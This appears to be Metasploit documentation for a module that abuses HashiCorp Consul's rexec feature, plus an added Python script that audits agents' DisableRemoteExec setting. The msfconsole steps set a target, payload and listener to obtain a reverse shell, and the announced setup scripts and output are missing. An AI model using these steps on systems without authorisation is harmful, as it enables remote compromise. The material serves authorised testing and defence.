Path: blob/master/documentation/modules/exploit/multi/misc/consul_rexec_exec.md
Vulnerable Application
HashiCorp Consul with the disable_remote_exec configuration flag set to false (default configuration up to version 0.8, opt-in since version 0.9).
Description
This module exploits a feature of HashiCorp Consul named rexec.
The exec command provides a mechanism for remote execution. For example, this can be used to run the uptime command across all machines providing the web service.
The exposure of the rexec service depends on the disable_remote_exec option. This option was set to true starting from Consul 0.8, to make remote exec opt-in instead of opt-out.
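For operators auditing their own agents, the following added example (not part of the module or its documentation) classifies agents by the disable_remote_exec setting they report. It assumes the setting is read from the body of the agent's /v1/agent/self endpoint, where it appears as DisableRemoteExec under Config or DebugConfig depending on the Consul version; the node names and sample responses are constructed.

```python
import json

FIELD = "DisableRemoteExec"  # assumed JSON name of disable_remote_exec


def remote_exec_state(agent_self):
    """Classify one parsed /v1/agent/self document.

    Returns "enabled", "disabled" or "unknown".
    """
    values = []
    for section in ("Config", "DebugConfig"):
        block = agent_self.get(section)
        if isinstance(block, dict) and FIELD in block:
            values.append(block[FIELD])
    if not values:
        return "unknown"
    if any(v is False for v in values):
        return "enabled"   # an explicit false means rexec is exposed
    if all(v is True for v in values):
        return "disabled"
    return "unknown"       # non-boolean value: treat as unverified


def audit(fleet):
    """fleet maps node name -> raw response body.

    Returns only the nodes that are not provably disabled.
    """
    findings = {}
    for node, raw in fleet.items():
        try:
            doc = json.loads(raw)
        except ValueError:
            doc = None     # e.g. a plain-text error body
        state = remote_exec_state(doc) if isinstance(doc, dict) else "unknown"
        if state != "disabled":
            findings[node] = state
    return findings


# Constructed sample bodies, trimmed to the relevant keys.
SAMPLES = {
    "consul-old": '{"Config": {"DisableRemoteExec": false}}',
    "consul-new": '{"Config": {}, "DebugConfig": {"DisableRemoteExec": true}}',
    "consul-optin": '{"DebugConfig": {"DisableRemoteExec": false}}',
    "consul-denied": "Permission denied",
}

if __name__ == "__main__":
    for node, state in sorted(audit(SAMPLES).items()):
        print(f"{node}: remote exec {state}")
```

Nodes reported as "unknown" did not expose the flag in the response and need their configuration checked directly.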
Test setup
The following bash script can be used to set up a testing environment with Docker:
You should observe something similar to the excerpt below when running the script:
The following bash script can be used to stop and destroy all your consul containers (so be careful if you use consul containers for other things at the same time):
Verification Steps
You can verify the module against the vulnerable application with these steps:
1. Launch a Consul cluster with the provided bash script
2. Start msfconsole
3. Do: use exploit/multi/misc/consul_rexec_exec
4. Do: set RHOST ip_of_consul_container
5. Do: set RPORT 8500
6. Do: check. The target should appear vulnerable.
7. Do: set payload with the payload of your choosing.
8. Do: set LHOST 172.17.42.1 (docker0 gateway IP)
9. Do: run
10. You should get a shell.
Scenarios
Reverse shell on Linux host
Exploit running against a Docker consul container target: